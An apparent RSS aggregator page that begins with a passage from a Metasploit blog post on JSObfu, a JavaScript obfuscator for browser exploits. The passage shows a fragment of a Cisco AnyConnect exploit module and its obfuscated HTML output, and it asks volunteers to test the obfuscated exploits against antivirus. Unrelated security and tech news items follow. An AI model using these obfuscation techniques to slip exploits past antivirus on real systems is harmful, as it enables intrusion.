Skape recognized this problem several years ago and added Rex::Exploitation::ObfuscateJS to address it. This first-gen obfuscator was based on substituting static strings which requires a priori knowledge of what you want to substitute, meaning you need to take care of variable names. Changes to the code need to be reflected in the calls to obfuscate() and anything you miss will remain static. It also means that you have to ensure variable names don't end up in a string or elsewhere where they might get inadvertantly smashed. To overcome these limitations, several modules employ a simple technique of using random values for javascript vars but they lose out on string manipulations.

 

Enter RKelly, a pure-ruby javascript lexer. Having a full parser gives us a lot more power than the previous obfuscation techniques available in the framework. For one, it gives us type information for literals, which makes string and number mangling really easy.  While a particular static ROP chain might be easy to fingerprint, that same string can be easily represented numerous ways through javascript manipulations. Some of the ideas for mangling literals came from Drivesploit with several new techniques thrown in as well. There's even a wrapper class, Rex::Exploitation::JSObfu for dealing with it. Syntax is simlar to it's older cousin, but without the need for klunky lists of varnames to replace.

 

Here's an example from windows/browser/cisco_anyconnect_exec:


    js = ::Rex::Exploitation::JSObfu.new %Q|
      var x = document.createElement("object"); 
      x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
      x.url = "#{url}/#{dir}/";
    |
    js.obfuscate
    html = "<html>\n<script>\n#{js}\n</script>\n</html>"


 

And the html as delivered to a browser:

<html>
<script>
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
</script>
</html>

Of course, this will be different for each request.

 

So now a call to arms. We could use some help testing 116 browser exploits to see if javascript obfuscation is viable and several issues make that more challenging. For one, getting ahold of the vulnerable software is sometimes quite difficult. Also, in some cases where the vulnerability has very restrictive memory layout requirements, obfuscation may break the exploit.

 

What we need is people with old browsers and old plugins/toolbars/etc who can:

  • Modify exploit modules to use the new obfuscation techniques
  • Test their changes against as many versions of the vulnerable software as possible
  • Test their changes against any anti-virus that claims to protect web browsing

If you're interested in helping out, contact me in #metasploit on FreeNode, or @egyp7 on twitter.

 

 

[1] Gathered with the following commands:

  $ ls modules/exploits/*/browser/*.rb | wc -l
  152
  $ ls modules/exploits/*/browser/*.rb | xargs grep '<script' | wc -l
  116
Channel Image14:56 Japanese Translation» securecoding.org
Secure Coding: Principles and Practices has been translated to Japanese by O'Reilly Japan.
Channel Image14:56 Introducing Wired Opinion: The Idea Shop Is Open» Wired Top Stories
Over the past few months we?ve been inviting Wired-minded people to post their thoughts on technology and society and the trends and ideas that will matter most. Today, we?re making things official with Wired Opinion ? a new section offering daily insight, argument and provocation from some of the world?s most innovative thinkers and doers.


Channel Image14:56 Introducing DOM Snitch, our passive in-the-browser reconnaissance tool» Google Online Security Blog
Posted by Radoslav Vasilev, Security Test Engineer

(Cross-posted from the Google Testing Blog)

Every day modern web applications are becoming increasingly sophisticated, and as their complexity grows so does their attack surface. Previously we introduced open source tools such as Skipfish and Ratproxy to assist developers in understanding and securing these applications.

As existing tools focus mostly on testingserver-side code, today we are happy to introduce DOM Snitch — an experimental* Chrome extension that enables developers and testers to identify insecure practices commonly found in client-side code. To do this, we have adopted several approaches to intercepting JavaScript calls to key and potentially dangerous browser infrastructure such as document.write or HTMLElement.innerHTML (among others). Once a JavaScript call has been intercepted, DOM Snitch records the document URL and a complete stack trace that will help assess if the intercepted call can lead to cross-site scripting, mixed content, insecure modifications to the same-origin policy for DOM access, or other client-side issues.


Here are the benefits of DOM Snitch:
  • Real-time: Developers can observe DOM modifications as they happen inside the browser without the need to step through JavaScript code with a debugger or pause the execution of their application.
  • Easy to use: With built-in security heuristics and nested views, both advanced and less experienced developers and testers can quickly spot areas of the application being tested that need more attention.
  • Easier collaboration: Enables developers to easily export and share captured DOM modifications while troubleshooting an issue with their peers.
DOM Snitch is intended for use by developers, testers, and security researchers alike. Click here to download DOM Snitch. To read the documentation, please visit this page.


*Developers and testers should be aware that DOM Snitch is currently experimental. We do not guarantee that it will work flawlessly for all web applications. More details on known issues can be found here or in the project’s issues tracker.
Channel Image14:56 Internet security better but foul exploits grow, IBM says» Network World NetFlash
IBM said it found surprising improvements in Internet security such as a reduction in application security vulnerabilities, exploit code and spam, but it also noted that those improvements come with a price: Attackers have been forced to rethink their tactics.
Channel Image14:56 Improving SSL certificate security» Google Online Security Blog


In the wake of the recent Comodo fraud incident, there has been a great deal of speculation about how to improve the public key infrastructure, on which the security of the Internet rests. Unfortunately, this isn’t a problem that will be fixed overnight. Luckily, however, experts have long known about these issues and have been devising solutions for some time.

Given the current interest it seems like a good time to talk about two projects in which Google is engaged.

The first is the Google Certificate Catalog. Google’s web crawlers scan the web on a regular basis in order to provide our search and other services. In the process, we also keep a record of all the SSL certificates we see. The Google Certificate Catalog is a database of all of those certificates, published in DNS. So, for example, if you wanted to see what we think of https://www.google.com/’s certificate, you could do this:

$ openssl s_client -connect www.google.com:443 < /dev/null | openssl x509 -outform DER | openssl sha1
depth=1 /C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA
verify error:num=20:unable to get local issuer certificate
verify return:0
DONE
405062e5befde4af97e9382af16cc87c8fb7c4e2
$ dig +short 405062e5befde4af97e9382af16cc87c8fb7c4e2.certs.googlednstest.com TXT
"14867 15062 74"


In other words: take the SHA-1 hash of the certificate, represent it as a hexadecimal number, then look up a TXT record with that name in the certs.googlednstest.com domain. What you get back is a set of three numbers. The first number is the day that Google’s crawlers first saw that certificate, the second is the most recent day, and the third is the number of days we saw it in between.

In order for the hash of a certificate to appear in our database, it must satisfy some criteria:
  • It must be correctly signed (either by a CA or self-signed).
  • It must have the correct domain name — that is, one that matches the one we used to retrieve the certificate.
The basic idea is that if a certificate doesn’t appear in our database, despite being correctly signed by a well-known CA and having a matching domain name, then there may be something suspicious about that certificate. This endeavor owes much to the excellent Perspectives project, but it is a somewhat different approach.

Accessing the data manually is rather difficult and painful, so we’re thinking about how to add opt-in support to the Chrome browser. We hope other browsers will in time consider acting similarly.

The second initiative to discuss is the DANE Working Group at the IETF. DANE stands for DNS-based Authentication of Named Entities. In short, the idea is to allow domain operators to publish information about SSL certificates used on their hosts. It should be possible, using DANE DNS records, to specify particular certificates which are valid, or CAs that are allowed to sign certificates for those hosts. So, once more, if a certificate is seen that isn’t consistent with the DANE records, it should be treated with suspicion. Related to the DANE effort is the individually contributed CAA record, which predates the DANE WG and provides similar functionality.

One could rightly point out that both of these efforts rely on DNS, which is not secure. Luckily we’ve been working on that problem for even longer than this one, and a reasonable answer is DNSSEC, which enables publishing DNS records that are cryptographically protected against forgery and modification.

It will be some time before DNSSEC is deployed widely enough for DANE to be broadly useful, since DANE requires every domain to be able to use DNSSEC. However, work is on the way to use DNSSEC for the Certificate Catalog well before the entire DNSSEC infrastructure is ready. If we publish a key for the domain in which we publish the catalog, clients can simply incorporate this key as an interim measure until DNSSEC is properly deployed.

Improving the public key infrastructure of the web is a big task and one that’s going to require the cooperation of many parties to be widely effective. We hope these projects will help point us in the right direction.
Channel Image14:56 Improving Conference Call Quality: What You Can Do» Hacking for Christ
Mozilla has a lot of conference calls. A lot. More time that is necessary is spent debugging audio issues and getting it so that everyone can just have a conversation. This post gives some tips on how you can make calls you are involved in a pleasant experience. Firstly, if you are just listening, that's fine - but mute yourself. All mobile phones and softphones, and some landline phones, have a mute button - use that for preference. If you are using a phone without a mute button, then "*1" mutes and unmutes you on the Mozilla system. The trouble with this is that a) people can hear the 'beep', and b) you can forget to unmute because there is no visual indicator. Prefer mute buttons with obvious visual indicators, and get into the habit of checking them before speaking. VoIP VoIP can be much better quality than POTS, but sometimes has more lag, and requires a stable internet connection (hotel WiFi not good). Prefer VoIP clients (like Blink) which show latency and packet loss so you can tell easily when your connection is sucking. You can now get cheap international POTS calls from various services, but they normally keep the cost down by squeezing the bandwidth even more than a normal phone line - so much so that sometimes, even DTMF doesn't work. So beware of that problem. If you are planning to participate using VoIP, never do so just using the microphone and speakers built into your laptop. You'll get poor sound quality, and everyone apart from you will get lots of echo too. (This is particularly bad, as you don't notice the problem, but everyone else does.) At the very least, get a pair of headphones. Better, get a headset. Mozilla IT recommends the Plantronics .Audio 646 DSP USB headset. You can get them for £19 ($25; €17) from various branches of Amazon, and they work on Windows, Mac and Linux. If you are a regular participant in Mozilla conference calls using VoIP, please, please get yourself one. If £19 is more than you can afford, let us know and we'll get one for you. (The reason we don't offer this to everyone straight off is that often the cost of postage is more then the cost of the headset.) Consider making a test call to your provider's echo service first to make sure everything is working...
Channel Image14:56 Idiotic Idea of the Day: Jailing Lurkers of Terror Websites» Wired Top Stories
French President Nicholas Sarkozy wants to criminalize visitors to pro-terrorism websites. An understandable idea at first -- but it would cripple open source terrorism analysis without stopping actual terrorists. Sacre bleu.


Channel Image14:56 How to update to Metasploit 4.0» Metasploit

If you're packing to go to Black Hat, Defcon or Security B-Sides in Las Vegas, make sure you also download Metasploit 4.0 to entertain you on the plane ride. If you missed the recent announcement, check out this blog post for a list of new features.

 

The new version is now available for all editions, and here's how you upgrade:

 

  • Metasploit Pro and Metasploit Express 4.0: For fresh installs, download version 4.0 of Metasploit Pro or Metasploit Express and install (to try these versions, use the same links). If you already have Metasploit Pro or Metasploit Express installed, simply go to the menu item "Administration" and choose "Software Update".
    Metasploit_Pro_Upgrade.png
  • Metasploit Framework 4.0: For fresh installs, download version 4.0 of Metasploit Framework and install. If you already have Metasploit Framework installed, you can use the SVN update function to upgrade to version 4.0. If you selected the automatic update during the installation of 3.7.2, youre installation should already be ready to go. If not, you can use the following steps to update:

 

$ sudo bash

# cd /opt/framework-3.x.x/msf3/

# svn update

 

In case you get stuck or have any questions, make sure you visit the Rapid7 Community to find answers, tips & tricks. Alternatively, just drop by our Black Hat booth #109 and ask us directly!


Try_Metasploit_Pro.png


Channel Image14:56 How One Response to a Reddit Query Became a Big-Budget Flick» Wired Top Stories
With a just handful of posts about a hypothetical time travel scenario, James Erwin went from web commenter to screenwriter.


Channel Image14:56 How Hockey Works» HowStuffWorks Daily Feed
From the frozen lakes and rivers of Canadian winters to nationally televised games played at high-tech arenas before 20,000 fans ... ice hockey has come a long way. Learn all about the game, the rules and the milestones of hockey.


Channel Image14:56 How CIOs Can Learn to Catch Insider Crime» Network World NetFlash
Research shows that CIOs rarely discover the internal security threats that can ruin companies, even though it frequently involves IT systems. Here's what needs to change.
Channel Image14:56 Hoax: Mozilla Firefox Online Promo» Hacking for Christ
I have recently had several reports of emails circulating like the following. These emails are fraudulent - Mozilla is not giving away £750,000, and if we did, we would not just randomly email people and offer them the money. Sir/Madam, Your E-mail Address has won (Seven Hundred and Fifty Thousand Great British Pounds only) GBP750,000 in the Mozilla Firefox Online promo recently conducted. To claim the prize, contact us back for confirmation at: <address removed> Congratulations! Yours faithfully, Sir. Nelson Gordon Coordinator Mozilla Firefox Online Promo Hopefully this blog post should show up in web searches for people who are smart enough to check before replying....
Channel Image14:56 Helpdesk outsourcing quagmire at heart of whistleblower lawsuit» Network World NetFlash
The city of San Diego gets computer helpdesk support via a contract for outsourced services with Gardenia, Calif.-based En Pointe Technologies, but a former employee claims En Pointe secretly contracted outsourcing work offshore to India and Pakistan, putting the city's public safety at risk.
Channel Image14:56 Hands-On: TweetDeck Wants to Be Your Pro Twitter Client Again» Wired Top Stories
TweetDeck has finally updated to a new version that I think I can proudly use and recommend -- at least to other slightly mental Twitter users, who, like myself, can take advantage of what TweetDeck can do to monitor a ton of information on a big screen.


Channel Image14:56 Goal 1 vs. Goal 2» Hacking for Christ
In the recent discussion about our iOS strategy, after a lot of exchanges, Asa and I finally found where we disagreed. I said (lightly edited): I think what is emerging here is a tension between two parts of the Mozilla mission. Goal 1: at the bottom, we want the web to be an open platform, built on open standards, where anyone can innovate, where apps are portable. Manifesto points 2, 6 and 7. Locked-down OSes work directly against this in the long term, and we should do everything we can to minimise their impact and appeal. Goal 2: higher up the stack, we want to give users control of their online lives - identity, privacy etc. Manifesto point 5, as you note. Making that happen requires having a presence on as many platforms as possible, and on making the experience as uniformly good as possible. It seems that we have decided our iOS strategy by looking at goal 2. But what's been missed is that you can't achieve goal 2 in the long term if you decide to concede on goal 1 - which your words suggest you are. We are adopting a strategy which assumes we will not achieve goal 1 in the long term. ... Bringing aspects of the Firefox experience to iOS benefits goal 2, but - I assert - works against goal 1. Whenever I make this point, you keep telling me "but it benefits goal 2!". I know that - that's not the point. Are you also saying that it has no effect at all on goal 1? And are you saying that if we win on goal 2, whether we win on goal 1 actually doesn't matter? How do you see the relationship between the goals? Asa replied: Ahhh. I think see where we disagree now. I do not accept that working on goal 2 necessarily harms goal 1. If you think it does, I'd like to hear more about why. (Also I absolutely do not think a "victory" on goal 2 negates the critical value of goal 1. I think both are very important and together make up the bulk of why Mozilla exists.) Gecko is huge leverage in a lot of ways. The Firefox product, including Sync, an Open Web App marketplace, a great identity system for the Web, people and sharing in the browser, etc. -- all of these not-Gecko features...
Channel Image14:56 Gmail account security in Iran» Google Online Security Blog


We learned last week that the compromise of a Dutch company involved with verifying the authenticity of websites could have put the Internet communications of many Iranians at risk, including their Gmail. While Google’s internal systems were not compromised, we are directly contacting possibly affected users and providing similar information below because our top priority is to protect the privacy and security of our users.

While users of the Chrome browser were protected from this threat, we advise all users in Iran to take concrete steps to secure their accounts:
  1. Change your password. You may have already been asked to change your password when you signed in to your Google Account. If not, you can change it here.
  2. Verify your account recovery options. Secondary email addresses, phone numbers, and other information can help you regain access to your account if you lose your password. Check to be sure your recovery options are correct and up to date here.
  3. Check the websites and applications that are allowed to access your account, and revoke any that are unfamiliar here.
  4. Check your Gmail settings for suspicious forwarding addresses or delegated accounts.
  5. Pay careful attention to warnings that appear in your web browser and don’t click past them.
For more ways to secure your account, you can visit http://www.google.com/help/security. If you believe your account has been compromised, you can start the recovery process here.
Channel Image14:56 Game|Life Podcast: Mickey's Missing Masterpiece, Marty's Mass Effect Madness» Wired Top Stories
After taking a break last week, we're back with a Game|Life podcast that spans a wide variety of topics.


Channel Image14:56 Galaxy Quest: See what Unearthly Dangers and Challenges Await You» HowStuffWorks Daily Feed
During a routine research flight, your partner and his crew fell into a wormhole leaving no trace of their whereabouts. Only a final distorted radio transmission remains and it's all that you have to guide you. With your loyal companion robot C5-PX at your side, you'll have to crisscross the galaxy to find them.


Channel Image14:56 Fuzzing at scale» Google Online Security Blog


One of the exciting things about working on security at Google is that you have a lot of compute horsepower available if you need it. This is very useful if you’re looking to fuzz something, and especially if you’re going to use modern fuzzing techniques.

Using these techniques and large amounts of compute power, we’ve found hundreds of bugs in our own code, including Chrome components such as WebKit and the PDF viewer. We recently decided to apply the same techniques to fuzz Adobe’s Flash Player, which we include with Chrome in partnership with Adobe.

A good overview of some modern techniques can be read in this presentation. For the purposes of fuzzing Flash, we mainly relied on “corpus distillation”. This is a technique whereby you locate a large number of sample files for the format at hand (SWF in this case). You then see which areas of code are reached by each of the sample files. Finally, you run an algorithm to generate a minimal set of sample files that achieves the code coverage of the full set. This calculated set of files is a great basis for fuzzing: a manageable number of files that exercise lots of unusual code paths.

What does corpus distillation look like at Google scale? Turns out we have a large index of the web, so we cranked through 20 terabytes of SWF file downloads followed by 1 week of run time on 2,000 CPU cores to calculate the minimal set of about 20,000 files. Finally, those same 2,000 cores plus 3 more weeks of runtime were put to good work mutating the files in the minimal set (bitflipping, etc.) and generating crash cases. These crash cases included an interesting range of vulnerability categories, including buffer overflows, integer overflows, use-after-frees and object type confusions.

The initial run of the ongoing effort resulted in about 400 unique crash signatures, which were logged as 106 individual security bugs following Adobe's initial triage. As these bugs were resolved, many were identified as duplicates that weren't caught during the initial triage. A unique crash signature does not always indicate a unique bug. Since Adobe has access to symbols and sources, they were able to group similar crashes to perform root cause analysis reducing the actual number of changes to the code. No analysis was performed to determine how many of the identified crashes were actually exploitable. However, each crash was treated as though it were potentially exploitable and addressed by Adobe. In the final analysis, the Flash Player update Adobe shipped earlier this week contained about 80 code changes to fix these bugs.

Commandeering massive resource to improve security is rewarding on its own, but the real highlight of this exercise has been Adobe’s response. The Flash patch earlier this week fixes these bugs and incorporates UIPI protections for the Flash Player sandbox in Chrome which Justin Schuh contributed assistance on developing. Fixing so many issues in such a short time frame shows a real commitment to security from Adobe, for which we are grateful.
Channel Image14:56 Future-Ready Content» A List Apart
The future is flexible, and we’re bending with it. From responsive web design to futurefriend.ly thinking, we’re moving quickly toward a web that’s more fluid, less fixed, and more easily accessed on a multitude of devices. As we embrace this shift, we need to relinquish control of our content as well, setting it free from the boundaries of a traditional web page to flow as needed through varied displays and contexts. Most conversations about structured content dive headfirst into the technical bits: XML, DITA, microdata, RDF. But structure isn’t just about metadata and markup; it’s what that metadata and markup mean. Sara Wachter-Boettcher shares a framework for making smart decisions about our content's structure.
Channel Image14:56 Four Years of Web Malware» Google Online Security Blog


Google’s Safe Browsing initiative has been protecting users from web pages that install malware for over five years now. Each day we show around 3 million malware warnings to over four hundred million users whose browsers implement the Safe Browsing API. Like other service providers, we are engaged in an arms race with malware distributors. Over time, we have adapted our original system to incorporate new detection algorithms that allow us to keep pace. We recently completed an analysis of four years of data that explores the evasive techniques that malware distributors employ. We compiled the results in a technical report, entitled “Trends in Circumventing Web-Malware Detection.”

Below are a few of the research highlights, but we recommend reviewing the full report for details on our methodology and measurements. The analysis covers approximately 160 million web pages hosted on approximately 8 million sites.

Social Engineering
Social engineering is a malware distribution mechanism that relies on tricking a user into installing malware. Typically, the malware is disguised as an anti-virus product or browser plugin. Social engineering has increased in frequency significantly and is still rising. However, it’s important to keep this growth in perspective — sites that rely on social engineering comprise only 2% of all sites that distribute malware.

Number of sites distributing Social Engineering Malware and Exploits over time

Drive-by Download Exploit Trends
Far more common than social engineering, malicious pages install malware after exploiting a vulnerability in the browser or a plugin. This type of infection is often called a drive-by download. Our analysis of which vulnerabilities are actively being exploited over time shows that adversaries quickly switch to new and more reliable exploits to help avoid detection. The graph below shows the ratio of exploits targeting a vulnerability in one CVE to all exploits over time. Most vulnerabilities are exploited only for a short period of time until new vulnerabilities become available. A prominent exception is the MDAC vulnerability which is present in most exploit kits.

Prevalence of exploits targeting specific CVEs over time

Increase in IP Cloaking
Malware distributors are increasingly relying upon ‘cloaking’ as a technique to evade detection. The concept behind cloaking is simple: serve benign content to detection systems, but serve malicious content to normal web page visitors. Over the years, we have seen more malicious sites engaging in IP cloaking. To bypass the cloaking defense, we run our scanners in different ways to mimic regular user traffic.

Number of sites practicing IP Cloaking over time

New Detection Capabilities
Our report analyzed four years of data to uncover trends in malware distribution on the web, and it demonstrates the ongoing tension between malware distributors and malware detectors. To help protect Internet users, even those who don’t use Google, we have updated the Safe Browsing infrastructure over the years to incorporate many state-of-the-art malware detection technologies. We hope the findings outlined in this report will help other researchers in this area and raise awareness of some of the current challenges.
Channel Image14:56 For a Future-Friendly Web» A List Apart
It is time to move toward a future-friendly web. Our current device landscape is a plethora of desktops, laptops, netbooks, tablets, feature phones, smartphones, and more, but this is just the beginning. The rapid pace of technological change is accelerating, and our current processes, standards, and infrastructure are quickly reaching their breaking points. How can we deal with increasing device diversity and decreasing attention spans? Brad Frost of futurefriend.ly explains how, while this era of ubiquitous connectivity creates new challenges, it also creates tremendous opportunities to reach people wherever they may be.
Channel Image14:56 Firefox, Vision And iOS» Hacking for Christ
Jay Sullivan recently posted a Vision Statement for Firefox. I want to comment on one paragraph in particular: Firefox has always been available for major desktop operating systems, but for many devices, Firefox in its current form -- client software with the Gecko Web rendering engine -- will not be feasible. Yet the experiences it offers should be available everywhere. The future browser will therefore be delivered in many ways, sometimes as client software, sometimes as a Web-based service. Or, to put it another way: "we want to do something on the iPhone, accepting (due to Apple App Store policies) that it'll have to be on top of Webkit". That is confirmed at the very bottom of the page: We will explore Web-based and other architectures to provide a Firefox experience to people on major OSs, including iOS. In the discussion about the vision statement in mozilla.dev.planning, dbaron said: Power over the full set of protocols and formats used for interchange of data on the Web is important to Firefox's ability to advance Mozilla's mission to promote "openness, innovation and participation on the Internet": it's a key piece of what gives Firefox leverage. We have the ability to reject changes to these protocols and formats that go against our mission, and while we don't (and shouldn't) have the ability to make any addition we want, we can strongly influence additions. Imagine, as an extreme example, a world where all Web browsing is done on WebKit on iOS devices, but the Firefox brand remains as one of the leading bookmarks/history sync services. The statement quoted above makes that seem like a possible success condition, but it seems like a failure to me, since we'd lose our ability to influence the technology of the Web. roc, bz and faaborg expressed support or similar sentiments. I also agree. If we end up delivering "the best experience that we can manage, consistent with our principles, but if necessary on someone else's technology stack", then as platform lockdown continues unopposed, what that "best" is will continue to degrade over time, until our situation is indistiguishable from failure. "Presenting compelling and important value" or "enabling great user experiences" is not enough. Facebook Connect presents compelling and important value - that's why a boatload of sites and users use it. But we are still kicking off a project to compete with it (and, ideally, eliminate it and...
Channel Image14:56 Firefox Version Numbers: Cognitive Dissonance» Hacking for Christ
Can anyone reconcile for me the following two opinions, both seemingly held strongly by the same people? Opinion A) Version numbers for Firefox are now irrelevant. See our version-numberless marketing! Everyone will just be on "the latest version". Soon, no-one will care about the numbers at all. Opinion B) There is no possibility whatsoever that, instead of internally numbering the next releases of Firefox 5, 6, 7 and so on, we could number then 5.1, 5.2, 5.3 and 5.4. That's totally out of the question - don't even ask. It's vital that we use this particular numbering scheme....
Channel Image14:56 Figuring out the data center fabric maze» Network World NetFlash
Despite vendor pledges to support existing or developing industry standards, users are expected to deploy single-vendor data center and cloud switching fabrics from their primary suppliers.
Channel Image14:56 Facebook warns employers not to ask job applicants for log-in credentials» Network World NetFlash
Facebook on Friday warned employers about trying to gain inappropriate access to Facebook accounts to check out private information about potential employees, citing possible legal liability.
Channel Image14:56 Facebook Condemns Companies That Demand User Logins» Wired Top Stories
Facebook chief privacy officer Erin Egan has condemned employers that ask -- or demand -- usernames and passwords from employees and prospective hires. "If you are a Facebook user, you should never have to share your password, let anyone access your account, or do anything that might jeopardize the security of your account or violate the privacy of your friends."


Channel Image14:56 Facebook Asserts Trademark on Word 'Book' in New User Agreement» Wired Top Stories
Facebook might not have the trademark on the word "book," but it's pretending to in its terms of service, and that might actually work.


Channel Image14:56 FTC Settles with Rail Companies, Responds to CDT Petition» Center for Democracy and Technology
Two companies that fired employees and rejected job applicants without informing them that those decisions were based on background checks have settled charges and agreed to pay $77,000 in civil penalties to the FTC. The FTC brought the charges in response to a petition filed by CDT and a group of advocates noting numerous violations of federal rules that require employers to provide proper notice and obtain consent before subjecting employees to criminal background checks. The FTC found the companies to be in violation of the Fair Credit Reporting Act (FCRA), which helps to protect consumers by requiring employers to inform employees and job applicants about the use of background checks in making employment decisions.
Channel Image14:56 Expanding Safe Browsing Alerts to include malware distribution domains» Google Online Security Blog


For the past year, we’ve been sending notifications to network administrators registered through the Safe Browsing Alerts for Network Administrators service when our automated tools find phishing URLs or compromised sites that lead to malware on their networks. These notifications provide administrators with important information to help them improve the security of their networks.

Today we’re adding distribution domains to the set of information we share. These are domains that are responsible for launching exploits and serving malware. Unlike compromised sites, which are often run by innocent webmasters, distribution domains are set up with the primary purpose of serving malicious content.

If you’re a network administrator and haven’t yet registered your AS, you can do so here.
Channel Image14:56 Every Time You Call a Proprietary Feature “CSS3,” a Kitten Dies» A List Apart
Any -webkit- feature that doesn’t exist in a specification (not even an Editor’s draft) is not CSS3. Yes, they are commonly evangelized as such, but they are not part of CSS at all. This distinction is not nitpicking. It’s important because it encourages certain vendors to circumvent the standards process, implement whatever they come up with in WebKit, then evangelize it to developers as the best thing since sliced bread. In our eagerness to use the new bling, we often forget how many people fought in the past decade to enable us to write code without forks and hacks and expect it to work interoperably. Lea Verou explains why single-vendor solutions are not the same as standards and not healthy for your professional practice or the future of the web.
Channel Image14:56 Defense and Celebration of the Online Commonwealth» Center for Democracy and Technology
The Center for Democracy & Technology invites you to join in celebrating the upcoming One Web Day (Sept. 22) by reading and signing the document: A Call to Defense and Celebration of the Online Commonwealth. This document, developed in collaboration with our new CDT Fellows, articulates core values that have enabled the Internet to prosper and highlights our shared duty to keep it open, innovative and free.
Channel Image14:56 Dawn of the Location-Enabled Web» Center for Democracy and Technology
CDT today released a Policy Post outlining issues related to the newly emerging location-enabled web. Location data should be under the control of the user; who collects it, what it gets used for, whether or not it gets shared and how long the data is stored are all decisions that should be in the hands of users, the Policy Post says. Location-enabled technologies should be designed with privacy in mind from the beginning, says the Policy Post. In addition, it says that ensuring that location information is transmitted and accessed in a privacy-protective way is essential to the future success of location-based applications and services.
Channel Image14:56 Congress Queries App Developers on Their Data Privacy Practices» Wired Top Stories
In the wake of a high-profile privacy scare involving the Path social networking app, Congress is advancing efforts to crack down on developers with rogue privacy and information storage policies.


Channel Image14:56 Cisco's big comeback» Network World NetFlash
Just a year ago, Cisco's stock was taking a beating after the sales failed to meet Wall Street expectations.The company wasn't exactly reeling, but CEO John Chambers knew something had to be done to right the ship.  
Channel Image14:56 Chrome warns users of out-of-date browser plugins» Google Online Security Blog



The new version of Google Chrome is not only speedier and simpler but it also improves user security by automatically disabling out-of-date, vulnerable browser plugins.

As browsers get better at auto-updating, out-of-date plugins are becoming the weakest link against malware attacks. Thousands of web sites are compromised every week, turning those sites into malware distribution vectors by actively exploiting out-of-date plugins that run in the browser. Simply visiting one of these sites is usually enough to get your computer infected.

Keeping all of your plugins up-to-date with the latest security fixes can be a hassle, so a while ago we started using our 20% time to develop a solution. The initial implementation was a Chrome extension called “SecBrowsing,” which kept track of the latest plugin versions and encouraged users to update accordingly. The extension helped us gather valuable knowledge about plugins, and we started working with the Chrome team to build the feature right inside the browser.

With the latest version of Chrome, users will be automatically warned about any out-of-date plugins. If you run into a page that requires a plugin that’s not current, it won’t run by default. Instead, you’ll see a message that will help you get the latest, most secure version of the plugin. An example of this message is below, and you can read more about the feature at the Chromium blog.

Channel Image14:56 Celebrating one year of web vulnerability research» Google Online Security Blog


In November 2010, we introduced a different kind of vulnerability reward program that encourages people to find and report security bugs in Google’s web applications. By all available measures, the program has been a big success. Before we embark further, we wanted to pause and share a few things that we’ve learned from the experience.

“Bug bounty” programs open up vulnerability research to wider participation.

On the morning of our announcement of the program last November, several of us guessed how many valid reports we might see during the first week. Thanks to an already successful Chromium reward program and a healthy stream of regular contributions to our general security submissions queue, most estimates settled around 10 or so. At the end of the first week, we ended up with 43 bug reports. Over the course of the program, we’ve seen more than 1100 legitimate issues (ranging from low severity to higher) reported by over 200 individuals, with 730 of those bugs qualifying for a reward. Roughly half of the bugs that received a reward were discovered in software written by approximately 50 companies that Google acquired; the rest were distributed across applications developed by Google (several hundred new ones each year). Significantly, the vast majority of our initial bug reporters had never filed bugs with us before we started offering monetary rewards.

Developing quality bug reports pays off... for everyone.

A well-run vulnerability reward program attracts high quality reports, and we’ve seen a whole lot of them. To date we’ve paid out over $410,000 for web app vulnerabilities to directly support researchers and their efforts. Thanks to the generosity of these bug reporters, we have also donated $19,000 to charities of their choice. It’s not all about money, though. Google has gotten better and stronger as a result of this work. We get more bug reports, which means we get more bug fixes, which means a safer experience for our users.

Bug bounties — the more, the merrier!

We benefited from looking at examples of other types of vulnerability reward programs when designing our own. Similarly, in the months following our reward program kick-off, we saw other companies developing reward programs and starting to focus more on web properties. Over time, these programs can help companies build better relationships with the security research community. As the model replicates, the opportunity to improve the overall security of the web broadens.

And with that, we turn toward the year ahead. We’re looking forward to new reports and ongoing relationships with the researchers who are helping make Google products more secure.
Channel Image14:56 Can You Really Sequence DNA With a USB Thumb Drive?» Wired Top Stories
What if you could put a few bacterial cells into a USB stick, plug it into your laptop, and get back a complete DNA sequence in a matter of minutes? Oxford Nanopore has built a USB device that will do just that. At least, that's what the company says. Known as MinION, the device received a hefty amount of press when it was announced in February, and it's slated for release to the world at large in the second half of the year. But many are still skeptical that this tiny device will really do what it's designed to do.


Channel Image14:56 CDT: Technology Can Provide Needed Transparency for Government Programs» Center for Democracy and Technology
CDT told a congressional panel today that providing the public with direct, online access to complex government programs, such as TARP, would strengthen oversight. Media, watchdog groups, researchers and citizens could then better analyze the data for a wide variety of purposes. CDT asked the House Oversight and Investigations Subcommittee to ensure that legislation explicitly require that TARP resources be made available to the public on the Web. CDT also noted that more sophisticated data--such as location and mapping data--are being collected today by government agencies; however, aging federal privacy law needs to be updated to ensure these new types of information are protected as well.
Channel Image14:56 CDT, EFF and PK File Brief in Ringtones Case» Center for Democracy and Technology
CDT, the Electronic Frontier Foundation, and Public Knowledge filed a "friend of the court" brief on Wednesday opposing efforts by the music licensing organization ASCAP to impose additional licensing payments on providers of musical ringtones for mobile phones. The brief urges the court to reject ASCAP's argument that ringtones are "public performances" under copyright law simply because a phone may ring when the user happens to be in a public place. ASCAP's position implies that numerous ordinary mobile phone users are copyright infringers and would expand copyright liability in ways that would chill innovation in products far beyond the relatively narrow context of ringtones.
Channel Image14:56 CDT Urges Privacy Requirements Be Included in Google Books Settlement» Center for Democracy and Technology
CDT today filed a "friend of the court" brief in the Southern District of New York requesting that key privacy requirements be included in the Court's approval of the class-action settlement that would dramatically expand Google Book Search. CDT previously released a report in July analyzing the privacy implications of this settlement and is urging the judge to guarantee strong privacy safeguards for the exciting new services Google will be able to offer. The brief asks that the court approve the proposed settlement of the copyright infringement lawsuit between Google and authors and publishers, but to retain oversight in order to monitor implementation of a privacy plan.
